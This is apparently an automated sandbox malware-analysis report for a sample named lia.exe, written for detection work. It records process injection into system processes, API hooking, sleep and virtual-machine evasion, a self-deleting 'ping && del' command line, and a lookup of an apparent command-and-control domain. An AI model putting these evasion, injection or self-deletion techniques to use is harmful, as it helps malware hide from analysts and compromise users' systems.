Source: Yara match	File source: 0000002B.00000002.757780721.0000026E98101000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000000.598890734.0000021DB8A00000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000000.590438554.0000021DB8A00000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.574044553.00000215F47E1000.00000020.00020000.sdmp, type: MEMORY

Hooks registry keys query functions (used to hide registry keys)

Source: explorer.exe

IAT, EAT, inline or SSDT hook detected: function: api-ms-win-core-registry-l1-1-0.dll:RegGetValueW

Self deletion via cmd delete

Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\lia.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\lia.exe

Modifies the export address table of user mode modules (user mode EAT hooks)

Source: explorer.exe

IAT of a user mode module has changed: module: KERNEL32.DLL function: CreateProcessAsUserW address: 7FFD8893521C

Modifies the prolog of user mode functions (user mode inline hooks)

Source: explorer.exe

User mode code has changed: module: KERNEL32.DLL function: CreateProcessAsUserW new code: 0xFF 0xF2 0x25 0x50 0x00 0x00

Modifies the import address table of user mode modules (user mode IAT hooks)

Source: explorer.exe

EAT of a user mode module has changed: module: user32.dll function: api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW address: 7FFD88935200

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Source: C:\Users\user\Desktop\lia.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Users\user\Desktop\lia.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lia.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\control.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Uses ping.exe to sleep

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping localhost -n 5

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\Desktop\lia.exe TID: 6364	Thread sleep time: -90000s >= -30000s			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7068	Thread sleep time: -6456360425798339s >= -30000s			Jump to behavior

Found evasive API chain (date check)

Source: C:\Users\user\Desktop\lia.exe	Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Source: C:\Windows\SysWOW64\cmd.exe	Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Contains long sleeps (>= 3 min)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5398			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3959			Jump to behavior

Found large amount of non-executed APIs

Source: C:\Windows\SysWOW64\cmd.exe

API coverage: 3.9 %

Found dropped PE file which has not been started or loaded

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\wvnfnueh\wvnfnueh.dll			Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\vjag4cgm\vjag4cgm.dll			Jump to dropped file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\Desktop\lia.exe

1_2_039E8409

Source: explorer.exe, 00000016.00000000.508063004.0000000008430000.00000004.00000001.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000016.00000000.543082281.00000000083E0000.00000004.00000001.sdmp	Binary or memory string: VMware SATA CD00dRom0
Source: explorer.exe, 00000016.00000000.506696613.00000000062E0000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000016.00000000.543082281.00000000083E0000.00000004.00000001.sdmp	Binary or memory string: VMware SATA CD00
Source: RuntimeBroker.exe, 00000021.00000000.563490355.0000021DB5A53000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000016.00000000.506696613.00000000062E0000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000016.00000000.542857487.00000000082E2000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
Source: RuntimeBroker.exe, 00000024.00000000.640630745.0000021910A2A000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}l
Source: mshta.exe, 0000000B.00000003.423217219.000002480E9FE000.00000004.00000001.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: explorer.exe, 00000016.00000000.542857487.00000000082E2000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: explorer.exe, 00000016.00000000.508063004.0000000008430000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000-;
Source: explorer.exe, 00000016.00000000.521348094.000000000095C000.00000004.00000020.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G

Source: C:\Users\user\Desktop\lia.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\lia.exe	Code function: 1_2_039F2ECF lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,	1_2_039F2ECF
Source: C:\Users\user\Desktop\lia.exe	Code function: 1_2_039EB9D4 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,	1_2_039EB9D4
Source: C:\Users\user\Desktop\lia.exe	Code function: 1_2_039DE91D lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,	1_2_039DE91D
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 44_2_036BE91D lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,	44_2_036BE91D
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 44_2_036CB9D4 FindFirstFileW,FindNextFileW,FindClose,FreeLibrary,	44_2_036CB9D4
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 44_2_036D2ECF memset,FindFirstFileW,memset,wcscpy,RtlEnterCriticalSection,RtlLeaveCriticalSection,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,FindNextFileW,WaitForSingleObject,FindClose,	44_2_036D2ECF

Anti Debugging:

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\lia.exe

Code function: 1_2_004012E6 LoadLibraryA,GetProcAddress,

1_2_004012E6

Enables debug privileges

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\lia.exe	Code function: 1_2_039D16AF ConvertStringSecurityDescriptorToSecurityDescriptorA,StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler,		1_2_039D16AF
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 44_2_036B16AF ConvertStringSecurityDescriptorToSecurityDescriptorA,StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler,		44_2_036B16AF

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe

Domain query: io.immontyr.com

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\lia.exe	Section loaded: unknown target: C:\Windows\System32\control.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\System32\control.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\System32\control.exe	Section loaded: unknown target: C:\Windows\System32\rundll32.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
Source: C:\Windows\explorer.exe	Section loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
Source: C:\Windows\explorer.exe	Section loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
Source: C:\Windows\explorer.exe	Section loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
Source: C:\Windows\explorer.exe	Section loaded: unknown target: C:\Windows\SysWOW64\cmd.exe protection: execute and read and write

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\lia.exe	Memory allocated: C:\Windows\System32\control.exe base: 5D0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\control.exe	Memory allocated: C:\Windows\explorer.exe base: A90000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\control.exe	Memory allocated: C:\Windows\System32\rundll32.exe base: 215F44A0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\explorer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 21DB7DC0000 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 219109E0000 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 2DACE190000 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 26E95750000 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory allocated: C:\Windows\SysWOW64\cmd.exe base: 3300000 protect: page execute and read and write

Creates a thread in another existing process (thread injection)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread created: C:\Windows\explorer.exe EIP: 88E31580	Jump to behavior
Source: C:\Windows\System32\control.exe	Thread created: C:\Windows\explorer.exe EIP: 88E31580	Jump to behavior
Source: C:\Windows\explorer.exe	Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: 88E31580
Source: C:\Windows\explorer.exe	Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: 88E31580
Source: C:\Windows\explorer.exe	Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: 88E31580
Source: C:\Windows\explorer.exe	Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: 88E31580

Writes to foreign memory regions

Source: C:\Users\user\Desktop\lia.exe	Memory written: C:\Windows\System32\control.exe base: 7FF6924512E0	Jump to behavior
Source: C:\Users\user\Desktop\lia.exe	Memory written: C:\Windows\System32\control.exe base: 5D0000	Jump to behavior
Source: C:\Users\user\Desktop\lia.exe	Memory written: C:\Windows\System32\control.exe base: 7FF6924512E0	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\explorer.exe base: 5EA000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\explorer.exe base: 7FFD88E31580	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\explorer.exe base: 850000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\explorer.exe base: 7FFD88E31580	Jump to behavior
Source: C:\Windows\System32\control.exe	Memory written: C:\Windows\explorer.exe base: 5E8000	Jump to behavior
Source: C:\Windows\System32\control.exe	Memory written: C:\Windows\explorer.exe base: 7FFD88E31580	Jump to behavior
Source: C:\Windows\System32\control.exe	Memory written: C:\Windows\explorer.exe base: A90000	Jump to behavior
Source: C:\Windows\System32\control.exe	Memory written: C:\Windows\explorer.exe base: 7FFD88E31580	Jump to behavior
Source: C:\Windows\System32\control.exe	Memory written: C:\Windows\System32\rundll32.exe base: 7FF7FF425FD0	Jump to behavior
Source: C:\Windows\System32\control.exe	Memory written: C:\Windows\System32\rundll32.exe base: 215F44A0000	Jump to behavior
Source: C:\Windows\System32\control.exe	Memory written: C:\Windows\System32\rundll32.exe base: 7FF7FF425FD0	Jump to behavior
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 515ACF4000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 21DB7DC0000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 789A650000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 219109E0000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: ECB1F3A000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 2DACE190000
